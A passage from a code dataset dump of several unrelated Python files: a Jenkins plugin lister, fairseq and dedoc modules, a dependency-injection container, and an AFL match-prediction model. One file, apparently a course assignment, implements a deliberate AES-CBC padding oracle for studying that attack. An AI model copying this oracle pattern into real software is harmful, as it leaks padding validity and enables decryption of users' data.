ET.XMLPullParser()\n plugins = []\n\n with requests.get(\n \"{jenkins_base_url}/{path}\".format(jenkins_base_url=jenkins_base_url, path=JENKINS_PLUGIN_MANAGER_PATH),\n auth=auth,\n stream=True\n ) as jenkins_response:\n # parse the xml plugins list a chunk at a time, a very large set of plugins may be installed\n for chunk in jenkins_response.iter_content(chunk_size):\n if chunk:\n xml_pull_parser.feed(chunk)\n try:\n for event, element in xml_pull_parser.read_events():\n \"\"\"\n Rely on the fact that a plugin version is always \n encountered after its short name in tag children\n \"\"\"\n if TAGS[\"SHORT_NAME\"] == element.tag:\n plugin_line = element.text\n elif TAGS[\"VERSION\"] == element.tag:\n plugins.append(plugin_line + \":\" + element.text)\n plugin_line = \"\"\n except ET.ParseError as parse_err:\n print(\n \"Jenkins response is not in parsable XML format, \"\n \"check your access rights to the instance: {parse_err}\"\n .format(parse_err=parse_err)\n )\n return 1\n for plugin in sorted(plugins):\n print(plugin)\n return 0\n\n\nif \"__main__\" == __name__:\n sys.exit(main())\n", "sub_path": "list-jenkins-plugins/list_jenkins_plugins.py", "file_name": "list_jenkins_plugins.py", "file_ext": "py", "file_size_in_byte": 2860, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 16, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.XMLPullParser", "line_number": 46, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 46, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 49, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree.ParseError", "line_number": 69, "usage_type": "attribute"}, {"api_name": "xml.etree.ElementTree", "line_number": 69, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 82, "usage_type": "call"}]}
+{"seq_id": "160806010", "text": "from fairseq.data import Dictionary\nfrom fairseq.data.meta_dataset import MetaFairseqDataset\nfrom . import FairseqTask, register_task\nimport torch\nimport os\n\n# Represents a sine task\n@register_task('meta')\nclass MetaTask(FairseqTask):\n\n @staticmethod\n def add_args(parser):\n \"\"\"Add task-specific arguments to the parser.\"\"\"\n parser.add_argument('data', nargs='+', help='path(s) to data directorie(s)')\n parser.add_argument('-s', '--source-lang', default='en', metavar='SRC',\n help='source language')\n parser.add_argument('-t', '--target-lang', default='de', metavar='TARGET',\n help='target language')\n\n def __init__(self, args, meta_train_tasks, meta_dev_tasks, meta_test_tasks, src_dict, tgt_dict):\n self.datasets = {}\n self.args = args\n self.meta_train_tasks = meta_train_tasks\n self.meta_dev_tasks = meta_dev_tasks\n self.meta_test_tasks = meta_test_tasks\n self.src_dict = src_dict\n self.tgt_dict = tgt_dict\n\n @classmethod\n def setup_task(cls, args, meta_train_tasks, meta_dev_tasks, meta_test_tasks, **kwargs):\n \"\"\"Setup the task (e.g., load dictionaries).\n\n Args:\n args (argparse.Namespace): parsed command-line arguments\n \"\"\"\n # load dictionaries\n src_dict = cls.load_dictionary(os.path.join(args.data[0], 'dict.{}.txt'.format(args.source_lang)))\n tgt_dict = cls.load_dictionary(os.path.join(args.data[0], 'dict.{}.txt'.format(args.target_lang)))\n assert src_dict.pad() == tgt_dict.pad()\n assert src_dict.eos() == tgt_dict.eos()\n assert src_dict.unk() == tgt_dict.unk()\n print('| [{}] dictionary: {} types'.format(args.source_lang, len(src_dict)))\n print('| [{}] dictionary: {} types'.format(args.target_lang, len(tgt_dict)))\n return cls(args=args, meta_train_tasks=meta_train_tasks, meta_dev_tasks=meta_dev_tasks,\n meta_test_tasks=meta_test_tasks, src_dict=src_dict, tgt_dict=tgt_dict)\n\n def load_dataset(self, split, **kwargs):\n \"\"\"Load a given dataset split.\n\n Args:\n split (str): name of the split (e.g., train, valid, test)\n \"\"\"\n if split == self.args.train_subset:\n self.datasets[split] = MetaFairseqDataset(split=split, meta_tasks=self.meta_train_tasks)\n elif split == self.args.valid_subset.split(',')[0]:\n self.datasets[split] = MetaFairseqDataset(split=split, meta_tasks=self.meta_dev_tasks)\n else:\n self.datasets[split] = MetaFairseqDataset(split=split, meta_tasks=self.meta_test_tasks)\n\n @property\n def source_dictionary(self):\n \"\"\"Return the source :class:`~fairseq.data.Dictionary`.\"\"\"\n return self.src_dict\n\n @property\n def target_dictionary(self):\n \"\"\"Return the target :class:`~fairseq.data.Dictionary`.\"\"\"\n return self.tgt_dict\n\n def inference_step(self, generator, models, sample, prefix_tokens=None):\n assert False\n\n def valid_step(self, sample, model, criterion, optimizer=None):\n model.eval()\n with torch.enable_grad():\n loss, sample_size, logging_output = criterion(model, sample)\n return loss, sample_size, logging_output\n", "sub_path": "fairseq/tasks/meta_task.py", "file_name": "meta_task.py", "file_ext": "py", "file_size_in_byte": 3284, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": 
"fairseq.data.meta_dataset.MetaFairseqDataset", "line_number": 54, "usage_type": "call"}, {"api_name": "fairseq.data.meta_dataset.MetaFairseqDataset", "line_number": 56, "usage_type": "call"}, {"api_name": "fairseq.data.meta_dataset.MetaFairseqDataset", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.enable_grad", "line_number": 75, "usage_type": "call"}]}
+{"seq_id": "162470128", "text": "\"\"\"Dependency injector declarative container.\"\"\"\n\nimport six\n\nfrom dependency_injector.providers import Provider\nfrom dependency_injector.errors import Error\n\nfrom .dynamic import DynamicContainer\nfrom .utils import (\n is_container,\n deepcopy,\n _check_provider_type,\n)\n\n\nclass DeclarativeContainerMetaClass(type):\n \"\"\"Declarative inversion of control container meta class.\"\"\"\n\n def __new__(mcs, class_name, bases, attributes):\n \"\"\"Declarative container class factory.\"\"\"\n cls_providers = tuple((name, provider)\n for name, provider in six.iteritems(attributes)\n if isinstance(provider, Provider))\n\n inherited_providers = tuple((name, provider)\n for base in bases if is_container(\n base) and base is not DynamicContainer\n for name, provider in six.iteritems(\n base.cls_providers))\n\n attributes['cls_providers'] = dict(cls_providers)\n attributes['inherited_providers'] = dict(inherited_providers)\n attributes['providers'] = dict(cls_providers + inherited_providers)\n\n cls = type.__new__(mcs, class_name, bases, attributes)\n\n for provider in six.itervalues(cls.providers):\n _check_provider_type(cls, provider)\n\n return cls\n\n def __setattr__(cls, name, value):\n \"\"\"Set class attribute.\n\n If value of attribute is provider, it will be added into providers\n dictionary.\n\n :param name: Attribute's name\n :type name: str\n\n :param value: Attribute's value\n :type value: object\n\n :rtype: None\n \"\"\"\n if isinstance(value, Provider):\n _check_provider_type(cls, value)\n cls.providers[name] = value\n cls.cls_providers[name] = value\n super(DeclarativeContainerMetaClass, cls).__setattr__(name, value)\n\n def __delattr__(cls, name):\n \"\"\"Delete class attribute.\n\n If value of attribute is provider, it will be deleted from providers\n dictionary.\n\n :param name: Attribute's name\n :type name: str\n\n :rtype: None\n \"\"\"\n if name in cls.providers and name in cls.cls_providers:\n del cls.providers[name]\n del cls.cls_providers[name]\n super(DeclarativeContainerMetaClass, cls).__delattr__(name)\n\n\n@six.add_metaclass(DeclarativeContainerMetaClass)\nclass DeclarativeContainer(object):\n \"\"\"Declarative inversion of control container.\n\n .. 
code-block:: python\n\n class Services(DeclarativeContainer):\n auth = providers.Factory(AuthService)\n users = providers.Factory(UsersService,\n auth_service=auth)\n \"\"\"\n\n __IS_CONTAINER__ = True\n\n provider_type = Provider\n \"\"\"Type of providers that could be placed in container.\n\n :type: type\n \"\"\"\n\n instance_type = DynamicContainer\n \"\"\"Type of container that is returned on instantiating declarative\n container.\n\n :type: type\n \"\"\"\n\n providers = dict()\n \"\"\"Read-only dictionary of all providers.\n\n :type: dict[str, :py:class:`dependency_injector.providers.Provider`]\n \"\"\"\n\n cls_providers = dict()\n \"\"\"Read-only dictionary of current container providers.\n\n :type: dict[str, :py:class:`dependency_injector.providers.Provider`]\n \"\"\"\n\n inherited_providers = dict()\n \"\"\"Read-only dictionary of inherited providers.\n\n :type: dict[str, :py:class:`dependency_injector.providers.Provider`]\n \"\"\"\n\n overridden = tuple()\n \"\"\"Tuple of overriding containers.\n\n :type: tuple[:py:class:`DeclarativeContainer`]\n \"\"\"\n\n def __new__(cls, *args, **kwargs):\n \"\"\"Constructor.\n\n :return: Dynamic container with copy of all providers.\n :rtype: :py:class:`DynamicContainer`\n \"\"\"\n container = cls.instance_type(*args, **kwargs)\n container.provider_type = cls.provider_type\n\n for name, provider in six.iteritems(deepcopy(cls.providers)):\n setattr(container, name, provider)\n\n return container\n\n @classmethod\n def override(cls, overriding):\n \"\"\"Override current container by overriding container.\n\n :param overriding: Overriding container.\n :type overriding: :py:class:`DeclarativeContainer`\n\n :raise: :py:exc:`dependency_injector.errors.Error` if trying to\n override container by itself or its subclasses\n\n :rtype: None\n \"\"\"\n if issubclass(cls, overriding):\n raise Error('Container {0} could not be overridden '\n 'with itself or its subclasses'.format(cls))\n\n cls.overridden += (overriding,)\n\n for name, provider in six.iteritems(overriding.cls_providers):\n try:\n getattr(cls, name).override(provider)\n except AttributeError:\n pass\n\n @classmethod\n def reset_last_overriding(cls):\n \"\"\"Reset last overriding provider for each container providers.\n\n :rtype: None\n \"\"\"\n if not cls.overridden:\n raise Error('Container {0} is not overridden'.format(cls))\n\n cls.overridden = cls.overridden[:-1]\n\n for provider in six.itervalues(cls.providers):\n provider.reset_last_overriding()\n\n @classmethod\n def reset_override(cls):\n \"\"\"Reset all overridings for each container providers.\n\n :rtype: None\n \"\"\"\n cls.overridden = tuple()\n\n for provider in six.itervalues(cls.providers):\n provider.reset_override()\n", "sub_path": "src/dependency_injector/containers/declarative.py", "file_name": "declarative.py", "file_ext": "py", "file_size_in_byte": 5677, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "six.iteritems", "line_number": 22, "usage_type": "call"}, {"api_name": "dependency_injector.providers.Provider", "line_number": 23, "usage_type": "argument"}, {"api_name": "utils.is_container", "line_number": 26, "usage_type": "call"}, {"api_name": "dynamic.DynamicContainer", "line_number": 27, "usage_type": "name"}, {"api_name": "six.iteritems", "line_number": 28, "usage_type": "call"}, {"api_name": "six.itervalues", "line_number": 37, "usage_type": "call"}, {"api_name": "utils._check_provider_type", "line_number": 38, "usage_type": "call"}, 
{"api_name": "dependency_injector.providers.Provider", "line_number": 56, "usage_type": "argument"}, {"api_name": "utils._check_provider_type", "line_number": 57, "usage_type": "call"}, {"api_name": "dependency_injector.providers.Provider", "line_number": 93, "usage_type": "name"}, {"api_name": "dynamic.DynamicContainer", "line_number": 99, "usage_type": "name"}, {"api_name": "six.iteritems", "line_number": 139, "usage_type": "call"}, {"api_name": "utils.deepcopy", "line_number": 139, "usage_type": "call"}, {"api_name": "dependency_injector.errors.Error", "line_number": 157, "usage_type": "call"}, {"api_name": "six.iteritems", "line_number": 162, "usage_type": "call"}, {"api_name": "dependency_injector.errors.Error", "line_number": 175, "usage_type": "call"}, {"api_name": "six.itervalues", "line_number": 179, "usage_type": "call"}, {"api_name": "six.itervalues", "line_number": 190, "usage_type": "call"}, {"api_name": "six.add_metaclass", "line_number": 79, "usage_type": "call"}]}
+{"seq_id": "282995899", "text": "#!/usr/bin/env python3\n\n\"\"\"\nImplements a CBC padding oracle for AES-128-CBC.\n__author__ = Eik List\n__date__ = 2018-04\n__copyright__ = Creative Commons CC0\n\"\"\"\n\n# ---------------------------------------------------------\n\nimport base64\nfrom Crypto.Cipher import AES\nfrom Crypto import Random\n\n\n# ---------------------------------------------------------\n\nclass CBCPaddingOracle:\n \"\"\"\n Implements a CBC padding oracle for AES-128-CBC.\n \"\"\"\n\n def __init__(self, key: bytes):\n \"\"\"\n Sets the key.\n :param key:\n \"\"\"\n self.key = key\n\n # ---------------------------------------------------------\n\n def encrypt(self, initial_value: bytes, message: bytes) -> bytes:\n \"\"\"\n Pads the given message to a multiple of the block length,\n computes, and returns its encryption with AES-128-CBC-XMLPad.\n\n :param initial_value: 16-byte initial value.\n :param message: Plaintext of arbitrary length\n :return: Ciphertext whose length is a multiple of 16 bytes, but\n always at least the length of the message.\n \"\"\"\n\n message = self.pad(message)\n aes = AES.new(self.key, AES.MODE_CBC, initial_value)\n return aes.encrypt(message)\n\n # ---------------------------------------------------------\n\n def verify_padding(self, initial_value: bytes, ciphertext: bytes) -> bool:\n \"\"\"\n Given a ciphertext, evaluates if the padding is correct.\n :param initial_value: 16-byte initial value.\n :param ciphertext: Ciphertext. Length must be multiple of 16 bytes.\n :return: True if padding is correct, and False otherwise.\n \"\"\"\n aes = AES.new(self.key, AES.MODE_CBC, initial_value)\n message = aes.decrypt(ciphertext)\n padding = int.from_bytes(message[-1:], byteorder='big')\n\n if padding < 1 or padding > 16:\n return False\n\n for _ in range(padding):\n if ((int.from_bytes(message[-1:], byteorder='big')) != padding):\n return False\n message = message[:-1]\n\n return True\n\n def pad(self, message: bytes) -> bytes:\n \"\"\"\n Pads the given message to a multiple of 16 bytes\n \"\"\"\n diff = 16 - (len(message) % 16)\n if diff == 0:\n return message\n\n for _ in range(diff):\n message += bytes([diff])\n\n return message\n", "sub_path": "assignment-7/cbc_padding_oracle.py", "file_name": "cbc_padding_oracle.py", "file_ext": "py", "file_size_in_byte": 2401, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "Crypto.Cipher.AES.new", "line_number": 45, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 45, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.MODE_CBC", "line_number": 45, "usage_type": "attribute"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 57, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 57, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.MODE_CBC", "line_number": 57, "usage_type": "attribute"}]}
+{"seq_id": "123491884", "text": "import warnings\nfrom collections import OrderedDict, defaultdict\nfrom typing import List, Iterable, Optional, Dict\nfrom flask_restx import fields, Api, Model\n\nfrom dedoc.config import get_config\nfrom dedoc.data_structures.annotation import Annotation\nfrom dedoc.data_structures.paragraph_metadata import ParagraphMetadata\nfrom dedoc.data_structures.serializable import Serializable\nfrom dedoc.structure_constructor.annotation_merger import AnnotationMerger\nfrom dedoc.structure_parser.heirarchy_level import HierarchyLevel\nfrom dedoc.data_structures.line_with_meta import LineWithMeta\n\n\nclass TreeNode(Serializable):\n\n def __init__(self,\n node_id: str,\n text: str,\n annotations: List[Annotation],\n metadata: ParagraphMetadata,\n subparagraphs: List[\"TreeNode\"],\n hierarchy_level: HierarchyLevel,\n parent: Optional[\"TreeNode\"]):\n \"\"\"\n TreeNode helps to represent document as recursive tree structure. It has parent node (None for root ot the tree)\n and list of children nodes (empty list for list node)\n :param node_id: node id is unique in one document\n :param text: text of node\n :param annotations: some metadata related to the part of the text (as font size)\n :param metadata: metadata refers to entire node (as node type)\n :param subparagraphs: list of child of this node\n :param hierarchy_level: helps to define the position of this node in the document tree\n :param parent: parent node (None for root, not none for other nodes)\n \"\"\"\n self.node_id = node_id\n self.text = text\n self.annotations = annotations\n self.metadata = metadata\n self.subparagraphs = subparagraphs\n self.hierarchy_level = hierarchy_level\n self.parent = parent\n\n def to_dict(self, old_version: bool) -> dict:\n res = OrderedDict()\n res[\"node_id\"] = self.node_id\n res[\"text\"] = self.text\n res[\"annotations\"] = [annotation.to_dict(old_version) for annotation in self.annotations]\n res[\"metadata\"] = self.metadata.to_dict(old_version)\n res[\"subparagraphs\"] = [node.to_dict(old_version) for node in self.subparagraphs]\n return res\n\n @staticmethod\n def get_api_dict(api: Api, depth: int = 0, name: str = 'TreeNode') -> Model:\n return api.model(name, {\n 'node_id': fields.String(description=\"Document element identifier. It is unique within one tree (i.e. 
\"\n \"there will be no other such node_id in this tree, but in attachment \"\n \"it may occur) The identifier has the form 0.2.1 where each number \"\n \"means a serial number at the corresponding level of the hierarchy.\",\n required=True,\n example=\"0.2.1\"\n ),\n 'text': fields.String(description=\"text of node\", required=True, example=\"Закон\"),\n 'annotations': fields.List(fields.Nested(Annotation.get_api_dict(api),\n description=\"Text annotations \"\n \"(font, size, bold, italic and etc)\")),\n 'metadata': fields.Nested(ParagraphMetadata.get_api_dict(api),\n skip_none=True,\n allow_null=False,\n description=\"Paragraph meta information\"),\n 'subparagraphs': fields.List(fields.Nested(api.model('others_TreeNode', {})),\n description=\"Node childes (with type 'TreeNode') of structure tree\")\n if depth == get_config()['recursion_deep_subparagraphs']\n else fields.List(fields.Nested(TreeNode.get_api_dict(api,\n depth=depth + 1,\n name='refTreeNode' + str(depth))),\n description=\"Node childes (with type 'TreeNode') of structure tree\")\n })\n\n @staticmethod\n def create(lines: List[LineWithMeta] = None) -> \"TreeNode\":\n \"\"\"\n Creates a root node with given text\n :param lines: this lines should be the title of the document (or should be empty for documents without title)\n :return: root of the document tree\n \"\"\"\n page_id = 0 if len(lines) == 0 else min((line.metadata.page_id for line in lines))\n line_id = 0 if len(lines) == 0 else min((line.metadata.line_id for line in lines))\n\n texts = (line.line for line in lines)\n annotations = []\n text_length = 0\n for line in lines:\n annotations.extend(TreeNode.__shift_annotations(line=line, text_length=text_length))\n text_length += len(line.line)\n text = \"\".join(texts)\n metadata = ParagraphMetadata(\n paragraph_type=\"root\",\n page_id=page_id,\n line_id=line_id,\n predicted_classes=None)\n return TreeNode(\"0\",\n text,\n annotations=annotations,\n metadata=metadata,\n subparagraphs=[],\n hierarchy_level=HierarchyLevel.create_root(),\n parent=None)\n\n def add_child(self, line: LineWithMeta) -> \"TreeNode\":\n \"\"\"\n Create a new tree node - children of the given node from given line. 
Return newly created node\n :param line: Line with meta, new node will be built from this line\n :return: return created node (child of the self)\n \"\"\"\n new_node = TreeNode(\n node_id=self.node_id + \".{}\".format(len(self.subparagraphs)),\n text=line.line,\n annotations=line.annotations,\n metadata=line.metadata,\n subparagraphs=[],\n hierarchy_level=line.hierarchy_level,\n parent=self\n )\n self.subparagraphs.append(new_node)\n return new_node\n\n def add_text(self, line: LineWithMeta):\n \"\"\"\n add the text and annotations from given line, text is separated with \\n\n :param line: line with text to add\n :return:\n \"\"\"\n text_length = len(self.text)\n new_annotations = self.__shift_annotations(line, text_length)\n\n self.text += line.line\n self.annotations.extend(new_annotations)\n\n @staticmethod\n def __shift_annotations(line: LineWithMeta, text_length: int) -> List[Annotation]:\n new_annotations = []\n for annotation in line.annotations:\n new_annotation = Annotation(start=annotation.start + text_length,\n end=annotation.end + text_length,\n name=annotation.name,\n value=annotation.value)\n new_annotations.append(new_annotation)\n return new_annotations\n\n def get_root(self):\n \"\"\"\n :return: return root of the tree\n \"\"\"\n node = self\n while node.parent is not None:\n node = node.parent\n return node\n\n def merge_annotations(self):\n root = self.get_root()\n stack = [root]\n merger = AnnotationMerger()\n while len(stack) > 0:\n node = stack.pop()\n node.annotations = merger.merge_annotations(node.annotations, node.text)\n for sub_node in node.subparagraphs:\n stack.append(sub_node)\n", "sub_path": "dedoc/data_structures/tree_node.py", "file_name": "tree_node.py", "file_ext": "py", "file_size_in_byte": 7770, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "dedoc.data_structures.serializable.Serializable", "line_number": 15, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "dedoc.data_structures.annotation.Annotation", "line_number": 20, "usage_type": "name"}, {"api_name": "dedoc.data_structures.paragraph_metadata.ParagraphMetadata", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 22, "usage_type": "name"}, {"api_name": "dedoc.structure_parser.heirarchy_level.HierarchyLevel", "line_number": 23, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 24, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 45, "usage_type": "call"}, {"api_name": "flask_restx.Api", "line_number": 54, "usage_type": "name"}, {"api_name": "flask_restx.fields.String", "line_number": 56, "usage_type": "call"}, {"api_name": "flask_restx.fields", "line_number": 56, "usage_type": "name"}, {"api_name": "flask_restx.fields.String", "line_number": 63, "usage_type": "call"}, {"api_name": "flask_restx.fields", "line_number": 63, "usage_type": "name"}, {"api_name": "flask_restx.fields.List", "line_number": 64, "usage_type": "call"}, {"api_name": "flask_restx.fields", "line_number": 64, "usage_type": "name"}, {"api_name": "flask_restx.fields.Nested", "line_number": 64, "usage_type": "call"}, {"api_name": "dedoc.data_structures.annotation.Annotation.get_api_dict", "line_number": 64, "usage_type": "call"}, {"api_name": "dedoc.data_structures.annotation.Annotation", "line_number": 64, "usage_type": "name"}, {"api_name": "flask_restx.fields.Nested", "line_number": 67, "usage_type": "call"}, 
{"api_name": "flask_restx.fields", "line_number": 67, "usage_type": "name"}, {"api_name": "dedoc.data_structures.paragraph_metadata.ParagraphMetadata.get_api_dict", "line_number": 67, "usage_type": "call"}, {"api_name": "dedoc.data_structures.paragraph_metadata.ParagraphMetadata", "line_number": 67, "usage_type": "name"}, {"api_name": "dedoc.config.get_config", "line_number": 73, "usage_type": "call"}, {"api_name": "flask_restx.fields.List", "line_number": 71, "usage_type": "call"}, {"api_name": "flask_restx.fields", "line_number": 71, "usage_type": "name"}, {"api_name": "flask_restx.fields.Nested", "line_number": 71, "usage_type": "call"}, {"api_name": "flask_restx.fields.List", "line_number": 74, "usage_type": "call"}, {"api_name": "flask_restx.fields", "line_number": 74, "usage_type": "name"}, {"api_name": "flask_restx.fields.Nested", "line_number": 74, "usage_type": "call"}, {"api_name": "flask_restx.Model", "line_number": 54, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 81, "usage_type": "name"}, {"api_name": "dedoc.data_structures.line_with_meta.LineWithMeta", "line_number": 81, "usage_type": "name"}, {"api_name": "dedoc.data_structures.paragraph_metadata.ParagraphMetadata", "line_number": 97, "usage_type": "call"}, {"api_name": "dedoc.structure_parser.heirarchy_level.HierarchyLevel.create_root", "line_number": 107, "usage_type": "call"}, {"api_name": "dedoc.structure_parser.heirarchy_level.HierarchyLevel", "line_number": 107, "usage_type": "name"}, {"api_name": "dedoc.data_structures.line_with_meta.LineWithMeta", "line_number": 110, "usage_type": "name"}, {"api_name": "dedoc.data_structures.line_with_meta.LineWithMeta", "line_number": 128, "usage_type": "name"}, {"api_name": "dedoc.data_structures.line_with_meta.LineWithMeta", "line_number": 141, "usage_type": "name"}, {"api_name": "dedoc.data_structures.annotation.Annotation", "line_number": 144, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 141, "usage_type": "name"}, {"api_name": "dedoc.data_structures.annotation.Annotation", "line_number": 141, "usage_type": "name"}, {"api_name": "dedoc.structure_constructor.annotation_merger.AnnotationMerger", "line_number": 163, "usage_type": "call"}]}
+{"seq_id": "289271553", "text": "\"\"\"Module with wrapper class for XGBoost model and its associated data class\"\"\"\n\nfrom typing import List, Tuple, Optional, Union, Sequence, Callable\nimport os\nfrom functools import reduce\nimport pandas as pd\nimport numpy as np\nfrom sklearn.pipeline import make_pipeline, Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.externals import joblib\nfrom sklearn.base import BaseEstimator\nfrom xgboost import XGBRegressor\n\nfrom server.types import FeatureFunctionType\nfrom server.data_processors import (\n TeamDataStacker,\n FeatureBuilder,\n OppoFeatureBuilder\n)\nfrom server.data_processors.feature_functions import (\n add_last_week_result,\n add_last_week_score,\n add_cum_percent,\n add_cum_win_points,\n add_rolling_last_week_win_rate,\n add_ladder_position,\n add_win_streak,\n add_out_of_state,\n add_travel_distance,\n add_last_week_goals,\n add_last_week_behinds,\n)\nfrom server.data_processors import FitzroyDataReader\n\nYearsType = Tuple[Optional[int], Optional[int]]\n\nPROJECT_PATH: str = os.path.abspath(\n os.path.join(os.path.dirname(__file__), '../../../')\n)\n\n\nCOL_TRANSLATIONS = {\n 'home_points': 'home_score',\n 'away_points': 'away_score',\n 'margin': 'home_margin',\n 'season': 'year'\n}\nINDEX_COLS = ['team', 'year', 'round_number']\nREQUIRED_COLS: List[str] = ['year', 'score', 'oppo_score']\nFEATURE_FUNCS: Sequence[FeatureFunctionType] = [\n add_out_of_state,\n add_travel_distance,\n add_last_week_goals,\n add_last_week_behinds,\n add_last_week_result,\n add_last_week_score,\n add_cum_win_points,\n add_rolling_last_week_win_rate,\n add_win_streak\n]\nDATA_TRANSFORMERS: List[FeatureFunctionType] = [\n TeamDataStacker(index_cols=INDEX_COLS).transform,\n FeatureBuilder(feature_funcs=FEATURE_FUNCS).transform,\n OppoFeatureBuilder(\n match_cols=['team', 'year', 'round_number', 'score', 'oppo_score',\n 'out_of_state', 'at_home', 'oppo_team', 'venue', 'round_type']\n ).transform,\n # Features dependent on oppo columns\n FeatureBuilder(\n feature_funcs=[add_cum_percent, add_ladder_position]\n ).transform\n]\nDATA_READERS: List[Callable] = [FitzroyDataReader().match_results]\n\nnp.random.seed(42)\n\n\nclass MatchXGB():\n \"\"\"Create pipeline for for fitting/predicting with lasso model.\n\n Attributes:\n _pipeline (sklearn.pipeline.Pipeline): Scikit Learn pipeline\n with transformers & Lasso estimator.\n name (string): Name of final estimator in the pipeline ('XGBoost').\n \"\"\"\n\n def __init__(self) -> None:\n self._pipeline: Pipeline = make_pipeline(\n StandardScaler(), XGBRegressor()\n )\n\n @property\n def name(self) -> str:\n return self.__last_estimator()[0]\n\n def fit(self, X: pd.DataFrame, y: pd.Series) -> None:\n \"\"\"Fit estimator to the data.\n\n Args:\n X (pandas.DataFrame): Data features.\n y (pandas.Series): Data labels.\n\n Returns:\n None.\n \"\"\"\n\n self._pipeline.fit(X, y)\n\n def predict(self, X: pd.DataFrame) -> pd.Series:\n \"\"\"Make predictions base on the data input.\n\n Args:\n X (pandas.DataFrame): Data features.\n\n Returns:\n pandas.Series: Estimator predictions.\n \"\"\"\n\n y_pred = self._pipeline.predict(X)\n\n return pd.Series(y_pred, name='predicted_margin', index=X.index)\n\n def save(self,\n filepath: str = (f'{PROJECT_PATH}/server/ml_models/match_xgb/'\n 'match_xgb_model.pkl')) -> None:\n \"\"\"Save the pipeline as a pickle file.\n\n Args:\n filepath (string): The path where the pickle file is saved.\n\n Returns:\n None.\n \"\"\"\n\n joblib.dump(self._pipeline, filepath)\n\n 
def load(self,\n filepath: str = (f'{PROJECT_PATH}/server/ml_models/match_xgb/'\n 'match_xgb_model.pkl')) -> None:\n \"\"\"Load the pipeline from a pickle file.\n\n Args:\n filepath (string): The path to the file to laod.\n\n Returns:\n None.\n \"\"\"\n\n self._pipeline = joblib.load(filepath)\n\n def __last_estimator(self) -> Tuple[str, BaseEstimator]:\n return self._pipeline.steps[-1]\n\n\nclass MatchXGBData():\n \"\"\"Load and clean data for the XGB pipeline.\n\n Args:\n data_transformers (list[callable]): Functions that receive, transform,\n and return data frames.\n train_years (tuple[integer or None]): Minimum and maximum (inclusive) years\n for the training data.\n test_years (tuple[ingeter or None]): Minimum and maximum (inclusive) years\n for the test data.\n\n Attributes:\n data (pandas.DataFrame): Cleaned, unfiltered data frame.\n train_years (tuple[integer or None]): Minimum and maximum (inclusive) years\n for the training data.\n test_years (tuple[ingeter or None]): Minimum and maximum (inclusive) years\n for the test data.\n \"\"\"\n\n def __init__(self,\n data_readers: List[Callable] = DATA_READERS,\n data_transformers: List[FeatureFunctionType] = DATA_TRANSFORMERS,\n train_years: YearsType = (None, 2015),\n test_years: YearsType = (2016, 2016)) -> None:\n self._train_years = train_years\n self._test_years = test_years\n\n # Need to reverse the transformation steps, because composition makes the output\n # of each new function the argument for the previous\n compose_all = reduce(\n self.__compose_two, reversed(data_transformers), lambda x: x\n )\n\n data_frame = (data_readers[0]()\n .rename(columns=COL_TRANSLATIONS)\n .drop(['round', 'game', 'date'], axis=1))\n\n # There was some sort of round-robin finals round in 1897 and figuring out\n # a way to clean it up that makes sense is more trouble than just dropping a few rows\n data_frame = data_frame[(data_frame['year'] != 1897) &\n (data_frame['round_number'] != 15)]\n\n self.data = compose_all(data_frame).drop('venue', axis=1).dropna()\n\n def train_data(self) -> Tuple[pd.DataFrame, pd.DataFrame]:\n \"\"\"Filter data by year to produce training data.\n\n Returns:\n Tuple[pandas.DataFrame]: Training features and labels.\n \"\"\"\n\n data_train = self.data[\n (self.data['year'] >= self.__train_min()) &\n (self.data['year'] <= self.__train_max())\n ]\n\n X_train = self.__X(data_train)\n y_train = self.__y(data_train)\n\n return X_train, y_train\n\n def test_data(self) -> Tuple[pd.DataFrame, pd.DataFrame]:\n \"\"\"Filter data by year to produce test data.\n\n Returns:\n Tuple[pandas.DataFrame]: Test features and labels.\n \"\"\"\n\n data_test = self.data[\n (self.data['year'] >= self.__test_min()) &\n (self.data['year'] <= self.__test_max())\n ]\n X_test = self.__X(data_test)\n y_test = self.__y(data_test)\n\n return X_test, y_test\n\n @property\n def train_years(self) -> YearsType:\n return self._train_years\n\n @train_years.setter\n def train_years(self, years: YearsType) -> None:\n self._train_years = years\n\n @property\n def test_years(self) -> YearsType:\n return self._test_years\n\n @test_years.setter\n def test_years(self, years: YearsType) -> None:\n self._test_years = years\n\n def __train_min(self) -> Union[int, float]:\n return self._train_years[0] or np.NINF\n\n def __train_max(self) -> Union[int, float]:\n return self._train_years[1] or np.Inf\n\n def __test_min(self) -> Union[int, float]:\n return self._test_years[0] or np.NINF\n\n def __test_max(self) -> Union[int, float]:\n return self._test_years[1] or 
